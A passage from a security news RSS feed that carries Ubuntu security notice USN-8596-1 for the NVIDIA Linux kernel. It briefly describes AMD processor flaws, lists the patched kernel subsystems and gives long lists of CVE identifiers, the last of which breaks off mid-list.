CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8596-1: Linux kernel (NVIDIA) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688351/unix-server/usn-8596-1-linux-kernel-nvidia-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688351/unix-server/usn-8596-1-linux-kernel-nvidia-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:20:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23226, CVE-2026-23227, CVE-2026-23244, CVE-2026-23245,
CVE-2026-23246, CVE-2026-23253, CVE-2026-23255, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23276, CVE-2026-23277, CVE-2026-23279,
CVE-2026-23281, CVE-2026-23284, CVE-2026-23285, CVE-2026-23286,
CVE-2026-23287, CVE-2026-23289, CVE-2026-23290, CVE-2026-23291,
CVE-2026-23292, CVE-2026-23293, CVE-2026-23296, CVE-2026-23298,
CVE-2026-23300, CVE-2026-23302, CVE-2026-23303, CVE-2026-23304,
CVE-2026-23306, CVE-2026-23307, CVE-2026-23308, CVE-2026-23310,
CVE-2026-23312, CVE-2026-23313, CVE-2026-23315, CVE-2026-23317,
CVE-2026-23318, CVE-2026-23319, CVE-2026-23321, CVE-2026-23324,
CVE-2026-23325, CVE-2026-23330, CVE-2026-23334, CVE-2026-23335,
CVE-2026-23336, CVE-2026-23339, CVE-2026-23340, CVE-2026-23343,
CVE-2026-23347, CVE-2026-23352, CVE-2026-23356, CVE-2026-23357,
CVE-2026-23359, CVE-2026-23360, CVE-2026-23361, CVE-2026-23362,
CVE-2026-23363, CVE-2026-23364, CVE-2026-23365, CVE-2026-23367,
CVE-2026-23368, CVE-2026-23369, CVE-2026-23370, CVE-2026-23372,
CVE-2026-23374, CVE-2026-23375, CVE-2026-23378, CVE-2026-23379,
CVE-2026-23381, CVE-2026-23382, CVE-2026-23383, CVE-2026-23386,
CVE-2026-23387, CVE-2026-23388, CVE-2026-23389, CVE-2026-23391,
CVE-2026-23395, CVE-2026-23396, CVE-2026-23397, CVE-2026-23398,
CVE-2026-23399, CVE-2026-23401, CVE-2026-23412, CVE-2026-23413,
CVE-2026-23414, CVE-2026-23418, CVE-2026-23419, CVE-2026-23420,
CVE-2026-23426, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439,
CVE-2026-23440, CVE-2026-23441, CVE-2026-23442, CVE-2026-23444,
CVE-2026-23446, CVE-2026-23447, CVE-2026-23448, CVE-2026-23449,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23456, CVE-2026-23457,
CVE-2026-23458, CVE-2026-23460, CVE-2026-23461, CVE-2026-23462,
CVE-2026-23463, CVE-2026-23464, CVE-2026-23465, CVE-2026-23468,
CVE-2026-23470, CVE-2026-23474, CVE-2026-23475, CVE-2026-31389,
CVE-2026-31391, CVE-2026-31392, CVE-2026-31393, CVE-2026-31394,
CVE-2026-31396, CVE-2026-31399, CVE-2026-31400, CVE-2026-31403,
CVE-2026-31405, CVE-2026-31407, CVE-2026-31408, CVE-2026-31409,
CVE-2026-31412, CVE-2026-31413, CVE-2026-31414, CVE-2026-31415,
CVE-2026-31416, CVE-2026-31417, CVE-2026-31421, CVE-2026-31422,
CVE-2026-31423, CVE-2026-31424, CVE-2026-31425, CVE-2026-31426,
CVE-2026-31427, CVE-2026-31428, CVE-2026-31429, CVE-2026-31430,
CVE-2026-31432, CVE-2026-31433, CVE-2026-31434, CVE-2026-31438,
CVE-2026-31439, CVE-2026-31440, CVE-2026-31441, CVE-2026-31446,
CVE-2026-31447, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31480, CVE-2026-31482,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31487, CVE-2026-31488,
CVE-2026-31489, CVE-2026-31492, CVE-2026-31494, CVE-2026-31495,
CVE-2026-31496, CVE-2026-31497, CVE-2026-31498, CVE-2026-31499,
CVE-2026-31500, CVE-2026-31502, CVE-2026-31503, CVE-2026-31505,
CVE-2026-31506, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
